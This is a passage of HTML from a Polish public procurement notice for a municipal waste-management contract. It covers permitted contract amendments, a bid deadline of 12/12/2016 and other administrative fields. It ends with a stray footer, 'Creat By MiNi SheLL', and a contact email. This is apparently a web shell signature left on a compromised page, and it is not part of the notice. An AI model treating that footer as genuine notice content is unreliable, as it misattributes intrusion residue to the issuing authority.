b)odstąpienia, na wniosek Zamawiającego, od realizacji części zamówienia i związanej z tym zmiany wynagrodzenia, pod warunkiem wystąpienia obiektywnych okoliczności, których Zamawiający nie mógł przewidzieć na etapie przygotowania postępowania,a które powodują, że wykonanie przedmiotu umowy powodowałyby niekorzystne skutki, z uwagi na cel realizacji zamówienia i racjonalne wydatkowanie  środków publicznych,
c)zmiana formy zabezpieczenia należytego wykonania umowy,
d)zmiany ustawowej stawki podatku VAT,
e)zmiany ustawy o utrzymaniu czystości i porządku w gminach oraz rozporządzeń wykonawczych, a także zmian w prawie miejscowym w zakresie gospodarowania odpadami komunalnymi, które będą miały bezpośredni wpływ na wykonanie przedmiotu zamówienia.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b><br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com